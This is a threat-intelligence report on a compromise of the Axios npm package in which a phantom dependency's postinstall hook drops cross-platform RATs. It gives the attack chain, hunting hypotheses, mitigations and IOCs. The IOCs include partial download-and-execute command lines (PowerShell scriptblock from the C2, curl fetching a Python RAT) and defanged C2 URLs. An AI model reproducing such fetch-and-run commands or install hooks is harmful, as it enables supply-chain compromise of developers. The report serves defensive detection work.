Axios NPM Package Compromised: Supply Chain Attack Hits JavaScript HTTP Client with 100M+ Weekly Downloads

Key Takeaways

• The Axios npm package was compromised via a hijacked maintainer account, leading to the publication of malicious versions 1.14.1 and 0.30.4.
• The attack utilized a phantom dependency (plain-crypto-js@4.2.1) that executed a cross-platform RAT via a postinstall hook.
• The malware features sophisticated obfuscation and anti-forensics, deleting its own files and swapping in a clean decoy package.json after execution.
• The attacker bypassed GitHub Actions' OIDC Trusted Publisher safeguards by manually publishing the packages using a stolen npm token.
• Payloads are platform-specific, deploying an AppleScript daemon on macOS, a VBScript/PowerShell fileless execution chain on Windows, and a Python RAT on Linux.

Affected Systems

• macOS, Windows, and Linux systems running Node.js/npm environments that installed axios@1.14.1 or axios@0.30.4

Attack Chain

The attack begins when a developer installs a compromised version of Axios (1.14.1 or 0.30.4), which automatically resolves and downloads a phantom dependency named plain-crypto-js. During installation, npm triggers a postinstall hook that executes an obfuscated Node.js script (setup.js). This dropper detects the host OS and deploys a platform-specific payload: an AppleScript daemon on macOS, a VBScript/PowerShell fileless execution chain on Windows, or a Python RAT on Linux. After establishing persistence and contacting the C2 server, the dropper performs anti-forensics by deleting itself and replacing the malicious package.json with a clean decoy.

Detection Availability

• YARA Rules: No
• Sigma Rules: No
• Snort/Suricata Rules: No
• KQL Queries: No
• Splunk SPL Queries: No
• EQL Queries: No
• Other Detection Logic: No

The article does not provide specific detection rules (YARA, Sigma, etc.), but outlines behavioral indicators, file paths, and process ancestry patterns for custom detection engineering.

Detection Engineering Assessment

EDR Visibility: High — EDR solutions can easily monitor process ancestry (e.g., npm spawning node, curl, or powershell), file writes to suspicious locations (/tmp, %PROGRAMDATA%), and fileless execution techniques like [scriptblock]::Create(). Network Visibility: Medium — Network monitoring can detect outbound connections to the C2 domain and anomalous POST bodies mimicking npm traffic, though the traffic may blend in if not inspected at the application layer. Detection Difficulty: Moderate — While the initial vector is obfuscated and cleans up after itself, the resulting platform-specific payloads generate highly anomalous process trees that are standard detection targets.

Required Log Sources

• Process Creation (Event ID 4688 / Sysmon Event ID 1)
• File Creation (Sysmon Event ID 11)
• PowerShell Script Block Logging (Event ID 4104)
• Network Connections (Sysmon Event ID 3)

Hunting Hypotheses

Hypothesis	Telemetry	ATT&CK Stage	FP Risk
Look for npm or node processes spawning suspicious child processes like curl, powershell, or wscript, indicating a malicious postinstall hook.	Process Creation	Execution	Medium
Identify PowerShell execution utilizing [scriptblock]::Create() combined with Invoke-WebRequest, indicative of fileless payload loading.	PowerShell Script Block Logging	Execution	Low
Detect the creation or execution of a binary named wt.exe in the %PROGRAMDATA% directory, which is used for masquerading.	File Creation / Process Creation	Defense Evasion	Low
Monitor for the creation of executable files in /Library/Caches/ with the com.apple.act.mond naming convention on macOS.	File Creation	Persistence	Low

Control Gaps

• Lack of OIDC Trusted Publisher enforcement on npm
• Over-reliance on automated static analysis which missed the obfuscated dynamic requires
• Execution of npm lifecycle scripts by default

Key Behavioral Indicators

• Presence of node_modules/plain-crypto-js/
• Process tree: npm install -> sh -c node setup.js -> curl/powershell/wscript
• POST requests containing 'packages.npm.org/product' to non-npm domains

False Positive Assessment

• Low

Recommendations

Immediate Mitigation

• Pin Axios dependencies to known safe versions (1.14.0 or 0.30.3).
• Remove plain-crypto-js from node_modules and reinstall with --ignore-scripts.
• Block C&C domains (sfrclak.com, callnrwise.com) and IPs (142.11.206.73) at the network perimeter.

Infrastructure Hardening

• Enforce the use of 'npm ci --ignore-scripts' in CI/CD pipelines to prevent postinstall hook execution.
• Rotate all credentials, tokens, and secrets that were exposed in environments where the compromised package was installed.

User Protection

• Rebuild affected developer workstations from a known-good state rather than attempting to clean the RAT in place.
• Deploy EDR to monitor for anomalous process executions originating from Node.js or npm.

Security Awareness

• Educate developers on the risks of caret ranges (^1.14.0) in package.json and the importance of strict dependency pinning.
• Train maintainers on securing npm accounts and utilizing OIDC Trusted Publishers for CI/CD publishing.

MITRE ATT&CK Mapping

• T1195.002 - Compromise Software Supply Chain
• T1059.005 - Command and Scripting Interpreter: VBScript
• T1059.001 - Command and Scripting Interpreter: PowerShell
• T1059.006 - Command and Scripting Interpreter: Python
• T1027 - Obfuscated Files or Information
• T1036 - Masquerading
• T1070.004 - Indicator Removal: File Deletion
• T1082 - System Information Discovery
• T1071.001 - Application Layer Protocol: Web Protocols
• T1620 - Reflective Code Loading

Additional IOCs

• Ips:
  • 142[.]11[.]206[.]73 - C&C IP
• Domains:
  • sfrclak[.]com - Primary C&C domain
  • callnrwise[.]com - Secondary C&C domain
• Urls:
  • hxxp://sfrclak[.]com:8000/6202033 - Primary C&C callback
  • hxxp://sfrclak[.]com:8000/6202033.ps1 - Windows PowerShell payload download
• File Hashes:
  • fcb81618bb15edfdedfb638b4c08a2af9cac9ecfa551af135a8402bf980375cf (SHA256) - ld.py - Linux Python RAT
  • f7d335205b8d7b20208fb3ef93ee6dc817905dc3ae0c10a0b164f4e7d07121cd (SHA256) - system.bat - Windows fileless loader
  • ed8560c1ac7ceb6983ba995124d5917dc1a00288912387a6389296637d5f815c (SHA256) - system.bat - Windows fileless loader
  • 617b67a8e1210e4fc87c92d1d1da45a2f311c08d26e89b12307cf583c900d101 (SHA256) - system.bat - Windows fileless loader
  • 5bb67e88846096f1f8d42a0f0350c9c46260591567612ff9af46f98d1b7571cd (SHA1) - axios@1.14.1 malicious package
  • d6f3f62fd3b9f5432f5782b62d8cfd5247d5ee71 (SHA1) - axios@0.30.4 malicious package
  • 58401c195fe0a6204b42f5f90995ece5fab74ce7c69c67a24c61a057325af668 (SHA1) - plain-crypto-js@4.2.1 malicious phantom dependency
• File Paths:
  • %TEMP%\6202033.vbs - Windows VBScript launcher
  • %TEMP%\6202033.ps1 - Windows PowerShell payload
  • node_modules/plain-crypto-js/ - Directory indicating presence of the phantom dependency
• Command Lines:
  • Purpose: Execute postinstall dropper script | Tools: npm, node | Stage: Execution | node setup.js
  • Purpose: Locate PowerShell executable | Tools: cmd.exe, where | Stage: Discovery | where powershell
  • Purpose: Execute fileless PowerShell payload from C2 | Tools: powershell.exe, Invoke-WebRequest | Stage: Execution | powershell -w h -c "& ([scriptblock]::Create(
  • Purpose: Download and execute Linux Python RAT | Tools: curl, nohup, python3 | Stage: Execution | curl -o /tmp/ld.py
• Other:
  • packages.npm.org/product0 - macOS C&C POST body
  • packages.npm.org/product1 - Windows C&C POST body
  • packages.npm.org/product2 - Linux C&C POST body
  • ifstap@proton.me - Attacker email used for hijacked maintainer account
  • nrwise@proton.me - Attacker email used for decoy package publication